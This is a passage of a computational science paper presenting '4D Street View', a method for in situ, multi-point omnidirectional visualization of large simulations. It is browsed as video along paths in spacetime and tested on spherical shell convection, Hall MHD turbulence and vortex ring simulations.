is quick in our method even if the switched visualization method vb is a computationally heavy one. The rendering has already been done on the supercomputer. We can abstractly think of the video data collection as a set of videos with captured events from and within the simulation space. (We consider 3D simulations in this article). Since a video itself is a dataset of still images that are sequentially ordered in time, we can also regard the video data collection as a set of still images that are distributed in 4D spacetime. This data collection is a discrete subset of continuous function of pixel data defined in a five-dimensional space; the camera position in 3D and the viewing direction in 2D. Adelson & Bergen (1991) call the five-dimensional function “plenoptic function”, from plenus (complete)-optic. In short, our method connotes sightseeing in 4D. Specifying a path in spacetime (see Fig. 3), we extract a sequence of images along the path. The images are presented Figure 3 Video data collections and a path in 4D spacetime. Since the videos in the data collection are tied with their camera position, we can identify the data collection as a field of omnidirectional still images distributed in 4D (x, y, z and t) space. The user specifies a path in spacetime, and an application program extracts a sequence of images on the path and shows them on the PC window as a smooth video. Full-size DOI: 10.7717/peerj-cs.305/fig-3 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 5/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-3 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ on the PC window as a smooth video. If we notice an intriguing dynamics of the simulation in the video, we can fly to the location (i.e., we read the video file whose camera is close to the location) and observe the phenomenon. Note that we can also go back in time (or play the video backward in time) to identify the cause of the dynamics. We call this visualization method “Four Dimensional (4D) Street View” because it is reminiscent of Google Street View (Anguelov et al., 2010). Another ancestor of 4D Street View is QuickTime VR (Chen, 1995) that realized the interactive navigation of multiple files of panoramic pictures. The idea of interactive retrieval of image sequences from multiple video files can be traced back to “Movie-Maps” by Lippman (1980), in which the user interactively switch video segments at preregistered points. The actual procedure of the 4D Street View is separated into three stages, namely, the recording, conversion, and browsing. In the recording stage, we apply in situ visualizations on a supercomputer system with many omnidirectional cameras. In the conversion stage, we convert the output image dataset into a video data collection, which is the input of the browsing stage. In the browsing stage, we specify the camera path in 4D interactively and view the video on a PC window by a dedicated application program called 4D Street Viewer. RECORDING STAGE OF 4D STREET VIEW The recording stage of the 4D Street View should have the following three items, namely, multiple points of view, omnidirectional rendering, and in situ visualization. Multi-point visualization The multi-point visualization is theoretically the most straightforward part among the three items because it is generally possible to set plural viewpoints in an in situ visualization tool. In the 4D Street View, the configuration of the omnidirectional cameras is arbitrary. Herein, we place them in rectilinear distributions, that is, uniformly distributed in the x, y and z directions with the same spacings between the cameras in each direction. We denote the number of cameras in each direction as Cx, Cy and Cz. The total number of cameras is Cx × Cy × Cz. Figure 4 shows two types of distribution of omnidirectional cameras (green spheres) that are used in test simulations described later. In (A) and (b), the camera configuration is (Cx, Cy, Cz) = (10, 10, 10), and in (c) and (d), it is (Cx, Cy, Cz) = (64, 1, 1). The rectangular boxes in the figure denote the boundary of the simulations. Omnidirectional visualization To apply omnidirectional visualization from each camera, we follow the standard procedure of the cube mapping (Greene, 1986; Sellers, Wright & Haemel, 2015). We assume a virtual sphere and a cube around the point; see Fig. 5A. Projecting the edges of the cube onto the sphere from the center, we have twelve arcs of great circles. The arcs divide the sphere or the 4p solid angle into six parts, that is, front, back, right, left, top, and bottom. We perform visualizations with the regular perspective projection six times for the six areas. As a result, we obtain six pictures and save them in the Portable Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 6/23 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Network Graphics (PNG) format using libpng library during the simulation. Note that PNG is a graphics format with lossless compression. The pixel size of the six perspective projections used herein is 512 × 512. An example of the six images is shown in Fig. 5B. The six PNG files are combined to a single file as an omnidirectional image after the simulation in the conversion stage to be described later. We can, of course, directly apply the conversion to the omnidirectional images during the simulation. Implementing such functions is one of the future topics of this research. It would also be possible to use a visualization tool with direct rendering with the omnidirectional projection. In situ visualization We can choose any in situ visualization strategy for the recording stage. Here, we take the synchronous approach wherein the visualization functions are called and controlled by the simulation program. The same approach is taken, for example, by Yu et al. (2010). In this synchronous in situ visualization method, the simulation and visualization programs share the computer nodes. The computation for the simulation is suspended Figure 4 Two samples of the omnidirectional camera configuration (green spheres). (A & B) 3-D configuration of 1,000 cameras (viewed from different angles) used in the test simulation of the vortex- ring. (C & D) 1-D configuration of 64 cameras for the test simulation of Hall MHD turbulence. Full-size DOI: 10.7717/peerj-cs.305/fig-4 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 7/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-4 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ while the visualization is running. There is another approach to in situ visualization, referred to as the asynchronous in situ visualization, as in Dreher & Raffin (2014). In this case, the visualization program runs independent of the simulation program. We will comment on this asynchronous in situ visualization in Conclusions. As a renderer, we use VISMO (Ohno & Ohtani, 2014) in this study. VISMO is an in situ visualization library written in Fortran. It supports fundamental visualization methods, including the isosurface, slice plane, arrow glyphs, streamlines, and volume rendering. An essential feature of VISMO is that all the visualization methods are implemented based on the ray casting algorithm (Levoy & Marc, 1990). Therefore, VISMO can perform the in situ visualization on supercomputer systems with no GPU. VISMO is a self-contained library that requires no other basic tools or libraries except for libpng and a Fortran compiler. We can get visualization images with a simulation program by just calling VISMO’s functions. This is a great merit for simulation researchers. In our experiences, one of the general practical burdens in the situ visualization is the preparation of a necessary environment for a supercomputer system, for example, to install OSMesa that is a basic off-screen rendering library for OpenGL. Srend (Wetherbee et al., 2015) is a similar library as VISMO; it performs the in situ visualization of the volume rendering by the ray casting. Data conversion to MP4 As described above, every in situ visualization from a fixed point of view produces a set of six PNG images. After the simulation, we combine the six files into a single image, according to the following procedure. Firstly, we assume that the six images are projected onto the sphere (see Fig. 4A). The spherical image is then mapped to a single rectangular image by the equirectangular projection. The pixel size for the omnidirectional image in this work is 2,048 × 1,536. Figure 5 The omnidirectional visualization method in this study. (A) We divide the solid angle 4p around a point of view into six parts by projecting the edges of a cube onto a sphere. The centers of the cube and sphere are on the point. We then apply the standard perspective projections for each part for six times. (B) Example of the six images obtained by the in situ visualization in a test simulation. Full-size DOI: 10.7717/peerj-cs.305/fig-5 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 8/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-5 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ A set of omnidirectional image files from a certain camera position is then converted to a video file with MP4 codec (Puri, Chen & Luthra, 2004), which invokes a lossy but quality preserving compression to reduce the size. We use ffmpeg for this conversion. TEST SIMULATIONS To test 4D Street View, we apply this method to three different kinds of simulations. Thermal convection in spherical shell The first test simulation is thermal convection in a spherical shell vessel (see Fig. 6). A fluid is confined between two concentric spheres of radii ro = 1.0 and ri = 0.835876. Inward central gravity (gravity acceleration g) and fixed temperature difference DT between the spheres drive the thermal convection motion. Convection in spherical shells have been studied extensively in geophysics and astrophysics. The test simulation in this article is characterized by the lack of rotation of the spheres and the relatively shallow depth of the shell compared to the standard geophysical and astrophysical simulations. It is known that thermal convection in a spheical shell with relatively small gap, ro − ri, exhibits very different patterns, such as spiral rolls (Zhang, Liao & Zhang, 2002; Itano et al., 2015), from that in a deep shell. We solve the Navier-Stokes equation with the finite difference method on the Yin-Yang grid (Kageyama & Sato, 2004). We denote the spherical shell region on the spherical coordinate system r; ϑ; φf g as ri ≤ r ≤ ro, 0 ≤ ϑ ≤ p, −p ≤ φ < p. The grid size in the radial span is Nr = 21; the grid size in the latitudinal span of Yin- or Yang-component grid (p/4 ≤ ϑ ≤ 3p/4) is Nϑ = 240; the grid size in the longitudinal span (−3p/4 ≤ φ ≤ 3p/4) is Nφ = 720. The total grid size is Nr × Nϑ × Nφ × 2 = 21 × 240 × 720 × 2. (The last factor 2 is for Yin and Yang components.) A fourth-order explicit Runge-Kutta method is used for the time integration. Rayleigh number Ra = 2 × 104, which is a non-dimensional parameter that characterizes the drive of the convection. The initial condition of the simulation is force-balanced, convectively unstable state, that is, ∇p0 = ρ0 g, where ρ0 and p0 are mass density and pressure at time t = 0. The initial flow is zero; v = 0 at t = 0. We put a perturbation δp to the initial pressure Figure 6 The simulation model of the spherical shell convection and the coordinate system. Full-size DOI: 10.7717/peerj-cs.305/fig-6 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 9/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-6 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ field, p = p0 + δ p(r, ϑ, φ), to start the convection. In this experiment, we set a single-mode of the spherical harmonics; dpðr; ϑ; φÞ ¼ aðrÞ~Ym‘ ðϑ; φÞ, where ~Ym‘ is (normalized) spherical harmonics; R ~Ym‘ ~Ym 0 ‘0 dS ¼ d‘‘0dmm0. The radial function is given by aðrÞ ¼ c0 sinðp r � rið Þ=ðro � riÞÞ with c0 = 5 × 10−2. We set l = m = 32 in this test simulation, which means that the perturbation δ p is highly localized in the (co)latitudinal direction ϑ, near the equator ϑ = p/2, while it has sinusoidal mode m = 32 in the longitudinal direction φ. For 4D Street View, we place C = 9 omnidirectional cameras on the equatorial plane ϑ = p/2 with (Cx, Cy, Cz) = (3, 3, 1). We record the time development of the spherical shell convection with a constant interval of non-dimensional time τ = 0.173, from t = 0 to t = 14.5 (for every 100 simulation time-steps) for 85 frames in total. Figure 7 shows the time development of the convection visualized by isosurfaces of normalized radial velocity vr. Hall MHD turbulence The second simulation for the test of 4D Street View is a magnetohydrodynamics (MHD) turbulence with the Hall term. We incorporate in situ, multi-point, omnidirectional visualization cameras into a Hall MHD turbulence simulation code (Miura & Hori, 2009; Miura, Araki & Hamba, 2016; Miura, 2019). In the simulation, the time development of the Hall MHD equations are solved by the Fourier pseudo-spectral method. The simulation geometry is a cube with the periodic boundary condition in all (x, y and z) directions with 256 grid points in each direction. The 2/3-truncation technique Figure 7 Thermal convection in the spherical shell visualized by isosurfaces of normalized radial velocity vr = −0.02: The banana-like purple objects indicate the downward flow in the convection. (A)–(D) are convections at t = 0.346, 0.519, 2.08 and 6.58, respectively, viewed from a point on the equatorial ϑ = p/2 with radius r = 1.6, (E)–(H) are omnidirectional images at the same instances taken by the omnidirectional camera placed at the spherical origin r = 0. Full-size DOI: 10.7717/peerj-cs.305/fig-7 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 10/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-7 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ is used for the de-aliasing. The Runge–Kutta–Gill method is adopted for the temporal integration. As the initial condition, large scale velocity and magnetic fields are specified with random phases. Just after the simulation starts, the fluid goes through instabilities and the velocity and magnetic energies are transferred toward smaller and smaller scales until it reaches to a fully developed turbulence. The highly complicated dynamics is a test bench of the true value of 4D Street View for the interactive analysis of the in situ visualization. In this simulation, we try 1-D configuration of the omnidirectional cameras; (Cx, Cy, Cz) = (64, 1, 1) with 64 viewpoints on the x axis with a constant spacing, as shown in Figs. 4C and 4D. As shown in Fig. 8, we apply the in situ visualizations for the isosurfaces of the electric current density (colored in green-to-red) and the enstrophy density (gray-to-white). Figure 8 The hall MHD simulations used as a test of 4D street view. We apply three in situ visuali- zations (isosurface for two different fields and superposition of the two visualizatio methods). The upper three panels are for the initial condition. The time goes on to the middle and lower panels. Full-size DOI: 10.7717/peerj-cs.305/fig-8 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 11/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-8 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Vortex ring formation The third test is simulation of vortex ring (or a smoke ring) formation, which is well know phenomenon; see for example, Shariff & Leonard (1992) and Lim & Nickels (1995) for reviews. We assume a quiet gas in a rectangular box and apply an impulsive force in a localized region when the simulation starts. The fluid in the forced region is driven in the direction of the force. Although the initial flow exhibits complicated structures, the flow soon settles into a localized vortex in a simple torus, which is called a vortex ring. The vortex ring propagates at a uniform speed while maintaining its shape. The simulation model is as follows: We solve the Navier-Stokes equation for in the cartesian coordinate system (x, y, z). The simulation region is a rectangular box with normalized side lengths of Lx × Ly × Lz = 20 × 10 × 10; see Fig. 9. The periodic boundary condition is assumed in all directions of x, y and z. The origin of the coordinate system is at the center of the simulation region. In the initial condition, the fluid has no flow with uniform temperature and density. We apply a pulse of force F to drive the fluid when the simulation starts at t = 0. The Navier-Stokes equation is discretized by a second order, central finite difference method. A fourth-order explicit Runge-Kutta method is used for the time integration. The periodic boundary condition is assumed for all (x, y and z) directions. For this simulation, we have tried three different configurations of the omnidirectional cameras; (Cx, Cy, Cz) = (10, 10, 10), (20,10,5) and (3, 2, 1) with three visualization methods; (1) isosurface of the enstrophy density e = |∇ × v|2, where v is the flow velocity; (2) arrow glyphs of v; (3) stream lines of v. Figure 9 Simulation model of the vortex ring. (A) shows the simulation model. We assume a rec- tangular region filled with a compressible fluid with normalized side lengths 20, 10 and 10 in x, y and z directions, respectively. The origin of the coordinate system is at the center of the region. A pulse force in the +x direction is applied in a cylindrical region near the end boundary at x = −10. The force drives the fluid in the cylinder and it soon settles into a ring-shaped vortex. (B–D) show vortex ring propagation in the +x direction. Full-size DOI: 10.7717/peerj-cs.305/fig-9 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 12/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-9 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ We performed several experiments with different parameters for physics and visualization. In most cases, the driving force vector F has only the x component, but in one experiment, we also apply perpendicular (y and z) components in such a way that the driven flow has twisting component. It leads to an intriguing formation of the vortex ring with the flow helicity. 4D STREET VIEWER The omnidirectional video files are tied with their camera positions by means of their file names. For example, a video file named sample.00123.mp4 or sample.03_02_01.mp4 is recorded by the omnidirectional camera located at (cx, cy, cz) = (3,2,1) in the rectilinear configuration (Cx, Cy, Cz). The video files termed according to this naming convention constitute the input data collection of the 4D Street Viewer. The user specifies a camera position (cx, cy, cz) and changes it in real time through the 4D Street Viewer. Some keys on the keyboard are allocated to increment or decrement cx, cy and cz. Additionally, the user can specify the next camera to move by mouse clicks. A mouse click specifies a direction where one wants to move in the presented simulation space in the window. The 4D Street Viewer picks up one of neighboring cameras (cx ± 1, cy ± 1, cz ± 1) that is the closest to the line defined by the direction. Each time the user specifies a new camera position or switches to a new visualization method, the 4D Street Viewer retrieves the corresponding file from the data collection. It imports one file at a time directly from the data collection without buffering or prefetching. Since the frame number in the video is consistently passed over to the next video, the user can smoothly change the video file while playing a video. Figure 10 shows a snapshot of the window of the 4D Street Viewer with its user interface. One can resize the window by dragging a corner of the window with the mouse. Shown in the left panel is the view of the simulation from the current camera position and direction. In the right panel of the window, some texts are placed to present input video and the current status. The playing mode of the video (play/stop/reverse) as well as the current frame are controlled by the buttons and slider bars in the right panel. We have developed a 4D Street Viewer in the framework of KVS (Sakamoto & Koyamada, 2015). KVS is a visualization development framework provided as a C++ class library. Although the primary purpose of KVS is to provide a modular programming environment for scientific and information visualizations, it can also be used as a more general framework for the development of such a 4D Street Viewer as this. INTERACTIVE ANALYSIS OF THE TEST SIMULATIONS WITH 4D STREET VIEW Viewpoint translation We first present an interactive translation of the viewpoint by 4D Street Viewer, applied to the Hall MHD simulation. Figure 11 is a sequence of six snapshots from a recorded video in Supplemental Data (https://github.com/vizlab-kobe/4DSVTestData/blob/master/ movies/03-hall-mhd.mov). Since the number of the omnidirectional cameras along the Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 13/23 https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/03-hall-mhd.mov https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/03-hall-mhd.mov http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Figure 10 A snapshot of the window of the 4D street viewer. The left panel shows the current view extracted from an omnidirectional image in the input video. The camera configuration (Cx, Cy, Cz), current camera position (cx, cy, cz), current number of frame, and other information of the video data collection are shown in the right panel. Full-size DOI: 10.7717/peerj-cs.305/fig-10 Figure 11 Translation of the viewpoint in the Hall MHD simulation. (A–F) show an image sequence in the walk-through in the simulation region. Full-size DOI: 10.7717/peerj-cs.305/fig-11 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 14/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-10 http://dx.doi.org/10.7717/peerj-cs.305/fig-11 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ axis is sufficiently high (64 cameras), the user has a smooth experience of walk-through by changing the viewpoint by means of slide bar, mouse click or keyboard input. Although the six images (A)–(F) show the same frame (t = 0) in this Fig. 11, the video in Supplemental Data present the interactive translation also in time in the simulation’s space-time. Note that the smooth experience of the walk-through by the viewpoint translation by 4D Street View is not degraded even if the visualized scene is much more complicated when the turbulence is fully developed. (See the later part of the Supplemental video.) On the other hand, if we applied the post-hoc visualization for the fully developed turbulence, such as the bottom three panels in Fig. 8, the response would be slowed down for there are myriads of polygons. Looking around As in standard visualization applications, a mouse drag is allocated to the rotation of the view in the 4D Street Viewer. In our case, a rotation means resampling of the field-of- view around the specified direction from the omnidirectional image, as in the regular video-playing programs for panoramic videos. We perform the resampling with a GPU. In the standard post-hoc visualization programs, a rotation specified by a user invokes a rotational transformation of the scene in the computer graphics. Getting a new image after a rotation may be time-consuming if the rotated scene requires a massive rendering. As in the case of the viewpoint translation, in the 4D Street View, a rotated image always appears momentarily, regardless of the complexity of the scene, since views from any angle are already stored in the omnidirectional video. Figure 12 is a snapshot sequence taken from a video in Supplemental Data (https://github. com/vizlab-kobe/4DSVTestData/blob/master/movies/04-thin-shell-convection.mov). This figure demonstrates the changing the viewing-direction by 4D Street Viewer, for the spherical shell convection simulation. In the the left three panels, the viewpoint is located at a point on the equator at r = 0.807, which is just inside the inner sphere r = ri. The purple bar-like objects are isosurfaces of negative velocity vr; they denotes the downward flow of the convection cells (or convection rolls). The time frame is fixed in the left three panels. In the right three panels of Fig. 12, we move to the viewpoint located at the origin r = 0. We then play the video forward in time for a while to observe that the bar-like convection rolls grows toward the north and south poles, applying the mouse-drag again to observe the ring-like patterns near the north pole. The bar-like structure of the convection rolls cannot be maintained in the high latitude regions because the distances between the neighboring rolls (in the longitudinal direction) are decreased as the tips of the rolls get closer to the poles. Instead of the longitudinal rolls in the low-latitude regions, ring-like pattern appears in the polar regions, which is observed by isosurface of positive vr (upward flow) in the right three panels. Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 15/23 https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/04-thin-shell-convection.mov https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/04-thin-shell-convection.mov http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Change of visualization method We have changed the visualization method in 4D Street Viewer from the left panels to the right panels in Fig. 12. Figure 13 shows another example of the interactive switching of the applied visualization methods. This figure is an image sequence taken from a video in Supplemental Data (https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/ 02-vortex-ring.mov). In this case, simulation of the vortex ring with the twisting force is visualized by (i) isosurface of enstrophy density e and (i) isosurface of e plus stream lines of the flow velocity v. In this visualization, we change time frame, viewpoint position, viewing direction, and visualization method (with and without the stream lines). DISCUSSION The MP4 conversion by ffmpeg from the PNG images is the only stage wherein lossy compression is applied in our procedure. (The mapping to an omnidirectional image from the six directional images described incorporates pixel interpolations, but the image deterioration by the interpolation is negligibly small). To confirm the impacts of the lossy compression by MP4, we compare, in Fig. 14, an omnidirectional PNG image and Figure 12 Change of viewing direction of the spherical shell convection in the 4D Street Viewer by the mouse drag motion. Full-size DOI: 10.7717/peerj-cs.305/fig-12 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 16/23 https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/02-vortex-ring.mov https://github.com/vizlab-kobe/4DSVTestData/blob/master/movies/02-vortex-ring.mov http://dx.doi.org/10.7717/peerj-cs.305/fig-12 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ an image extracted from the MP4 video by 4D Street Viewer at the same frame. The degradation of the image quality by the MP4 conversion is negligibly small for visualization analysis. In this work, the largest number of the omnidirectional cameras scattered in the test simulations was 1000, that are for the vortex ring simulation. We applied two Figure 13 The vortex ring simulation with the twist force. The vortex ring simulation with the twist force. Two visualization methods (with and without the stream lines) are switched while playing the video. (A) shows an isosurface visualization without the stream lines. (B–E) show the same time frame with different view position and direction. (E) and (F) are also from the same frame later in the time development. Full-size DOI: 10.7717/peerj-cs.305/fig-13 Figure 14 Comparison of images before (A) and after (B) the lossy compression by MP4 codec. (A) The original omnidirectional PNG image. (B) Snapshot from MP4 video file at the same frame. Full-size DOI: 10.7717/peerj-cs.305/fig-14 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 17/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-13 http://dx.doi.org/10.7717/peerj-cs.305/fig-14 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ visualizations from each camera and the total size of the video files (2,048× 1,536 pixels × 101 frames) compressed in the MP4 codec was 6.0 × 109 B. This result shows that the data size of the video data collection in the 4D Street View with a thousand cameras can be regarded as small in today’s capacity norm of storage devices. The small size of the video data collection is due to the compression by the MP4 codec. For the Hall MHD simulation, we performed with the spatial resolution of 2563 and applied the in situ visualization for 21 time frames. The total storage size to save the three kinds of omnidirectional MP4 video files (electric current, enstrophy density, and their superposition) are 1.8 × 109 B. On the other hand, if we are to perform the post-hoc visualization, we would have to save raw numerical data of at least four fields (three components of the velocity vector plus one scalar) for the double precision (8 B) simulation. The storage size amounts to 2563 × 4 (fields) × 21 (time steps) × 8 B ∼ 1.1 × 1010 B. Even in this small-scale simulation, the storage size for 4D Street View method is smaller than the post-hoc visualization. The spatial resolution 2563 is too low in the current standard of the high performance computing. It is not rare to perform turbulence simulations with 4,0963 resolution these days. Saving the raw numerical data for the post-hoc visualization with this spatial resolution (and with corresponding temporal resolution) is certainly impractical: 4,0963 × 4 (fields) × 336 (time steps) × 8 B ∼ 7.4 × 1014 B. On the other hand, the storage size for 4D Street View is only weakly dependent on the spatial resolution of the simulation. In this work, we have placed the omnidirectional cameras in rectilinear configuration of 1-D, 2-D, or 3-D. However, the camera density is not necessarily uniform in the 4D Street View. We can reduce the total number of cameras by distributing them in a nonuniform way, concentrating only near focused regions. The video collection explored in the 4D Street View is a set of discrete samples of continuous plenoptic function (Adelson & Bergen, 1991) in the 5D space. It would be possible to apply image-based rendering techniques in computer graphics such as “view interpolation” (Chen & Williams, 1993) or “Plenoptic Modeling” (McMillan & Bishop, 1995) to obtain visualized images viewed from intermediate positions between specified view points. Generally, in situ visualization is a way to use supercomputer resources to suppress the burden of simulation researchers. They have recently spent most of their research time on post-hoc visualization, such as data transfer and preparation before starting the visualization itself. The situation will become worse in the future with the further development of supercomputer technology. Even today, the computing power for a single supercomputer system is excessive for a single simulation job. It would be a valid idea to use a supercomputer system primarily for the visualization and secondly for the simulation. CONCLUSIONS We have proposed a new visualization method referred to as the “4D Street View” for large-scale simulations. The key idea is to record a simulation with many omnidirectional Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 18/23 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ cameras that are scattered in the simulation space. The cameras record the simulation through in situ visualization. As a result of the simulation, we obtain a data collection of the omnidirectional videos. The videos in the data collection are tied with their camera positions. The video data collection can be regarded as a field of omnidirectional still images in 4D spacetime. We have developed a dedicated application program (4D Street Viewer) to explore video data collection. With the program, we interactively specify a path in 4D spacetime and extract a sequence of images along the path and show them as a smooth video on the screen. If we find an intriguing phenomenon that is far away from the current camera, we can “fly” there with the 4D Street Viewer and scrutinize it from nearby cameras. It is also possible to go backward in time to investigate the cause of the phenomenon. We can change the view-angle anytime since all views are stored in the omnidirectional images. We can also switch the applied visualization methods as long as the corresponding videos have been recorded in the simulation. One of the challenges of the 4D Street View is the time spent on the visualization. We have applied the synchronous in situ visualization in this work; the same computer nodes are allocated for the simulation and the visualization. The parallelization of the simulation determined the number of nodes. When we perform a visualization-intensive computation, we should allocate much more nodes to the in situ visualization than the simulation. We are developing another approach—asynchronous in situ visualization— for the recording stage of the 4D Street View (Kageyama, Sakamoto & Yamamoto, 2018). The simulation program and the visualization program run independently on different computer nodes with no explicit synchronization. They have their own main programs and own MPI_Init and MPI_Finalize calls. To realize this multiple program, multiple data (MPPD) framework, we place a layer called Membrane between the simulation and the visualization. With this the Membrane method, we can allocate any number of computer nodes for the in situ visualization of visualization-intensive cases. ACKNOWLEDGEMENTS We would like to thank Prof. Chandrajit Bajaj for suggesting the use of omnidirectional cameras to improve our mutil-point in situ visualization method. We thank Ms. Keiko Otsuji for her skilled technical assistance. We are grateful to Prof. Nobuaki Ohno for providing us with the VISMO’s source code. We are also grateful to Prof. Hedeaki Miura for providing us with the Hall MHD simulation code. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Grant-in-Aid for Scientific Research (KAKENHI) 16K12434 and 17H02998, SCAT (Support Center for Advanced Telecommunications Technology Research) Foundation, I-O Data Foundation, and Tateishi Science and Technology Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 19/23 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Foundation. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Grant-in-Aid for Scientific Research (KAKENHI): 16K12434 and 17H02998. Support Center for Advanced Telecommunications Technology Research (SCAT) Foundation. I-O Data Foundation. Tateishi Science and Technology Foundation. Competing Interests The authors declare that they have no competing interests. Author Contributions � Akira Kageyama conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Naohisa Sakamoto analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Source code is available at GitHub: https://github.com/vizlab-kobe/4DStreetViewMovieViewer. Data are available at GitHub: https://github.com/vizlab-kobe/4DSVTestData. Sample movies are available at GitHub: https://github.com/vizlab-kobe/4DSVTestData/tree/master/movies. REFERENCES Adelson EH, Bergen JR. 1991. The plenoptic function and the elements of early vision. In: Landy M, Movshon JA, eds. Computational Models of Visual Processing. Cambridge: The MIT Press, 3–20. Ahrens J, Jourdain S, O’Leary P, Patchett J, Rogers DH, Petersen M. 2014. An image-based approach to extreme scale in situ visualization and analysis. In: SC ’14: Proceedings of the International Conference for High Performance Computing, Networking, Storage and Analysis. 424–434. Anguelov D, Dulong C, Filip D, Frueh C, Lafon S, Lyon R, Ogale A, Vincent L, Weaver J. 2010. Google street view: capturing the world at street level. Computer 43(6):32–38 DOI 10.1109/MC.2010.170. Ayachit U, Bauer A, Geveci B, O’Leary P, Moreland K, Fabian N, Mauldin J. 2015. ParaView catalyst. In: Proceedings of the First Workshop on In Situ Infrastructures for Enabling Extreme-Scale Analysis and Visualization—ISAV2015. New York: ACM Press, 25–29. Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 20/23 https://github.com/vizlab-kobe/4DStreetViewMovieViewer https://github.com/vizlab-kobe/4DSVTestData https://github.com/vizlab-kobe/4DSVTestData/tree/master/movies http://dx.doi.org/10.1109/MC.2010.170 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ Ayachit U, Whitlock B, Wolf M, Loring B, Geveci B, Lonie D, Bethel EW. 2017. The SENSEI generic in situ interface. In: Proceedings of ISAV 2016: Workshop on In Situ Infrastructures for Enabling Extreme-Scale Analysis and Visualization - Held in conjunction with SC 2016. 40–44. Banesh D, Schoonover JA, Ahrens JP, Hamann B. 2017. Extracting, visualizing and tracking mesoscale ocean eddies in two-dimensional image sequences using contours and moments. In: Rink K, Middel A, Zeckzer D, Bujack R, eds. Workshop on Visualisation in Environmental Sciences. Darmstadt: The Eurographics Association, 43–47. Berres AS, Turton TL, Petersen M, Rogers DH, Ahrens JP. 2017. Video compression for ocean simulation image databases. Darmstadt: The Eurographics Association. Chen SE. 1995. QuickTime VR—an image-based approach to virtual environment navigation. In: Proceedings of the ACM SIGGRAPH Conference on Computer Graphics. New York: ACM, 29–38. Chen SE, Williams L. 1993. View interpolation for image synthesis. In: 20th Annual Conference on Computer Graphics and Interactive Techniques, SIGGRAPH 1993, New York, Association for Computing Machinery, Inc. New York: ACM, 279–288. Childs H, Ma K-L, Yu H, Whitlock B, Meredith J, Favre J, Klasky S, Podhorszki N. 2012. In situ processing. In: Betherl EW, Childs H, Hansen C, eds. High Performance Visualization: Enabling Extreme Scale Scientific Insight, Chapter 9. London: Chapman and Hall, 171–198. Dreher M, Raffin B. 2014. A flexible framework for asynchronous in situ and in transit analytics for scientific simulations. In: 14th IEEE/ACM International Symposium on Cluster, Cloud, and Grid Computing. Piscataway: IEEE, 277–286. Greene N. 1986. Environment mapping and other applications of world projections. IEEE Computer Graphics and Applications 6(11):21–29. Itano T, Ninomiya T, Konno K, Sugihara-Seki M. 2015. Spiral roll state in heat convection between nonrotating concentric double spherical boundaries. Journal of the Physical Society of Japan 84(10):103401 DOI 10.7566/JPSJ.84.103401. Kageyama A, Sakamoto N, Yamamoto K. 2018. Membrane layer method to separate simulation and visualization. In: 8th International Conference on Simulation and Modeling Methodologies, Technologies and Applications. 106–111. Kageyama A, Sato T. 2004. “Yin-Yang grid”: an overset grid in spherical geometry. Geochemistry, Geophysics, Geosystems 5:Q09005. Kageyama A, Yamada T. 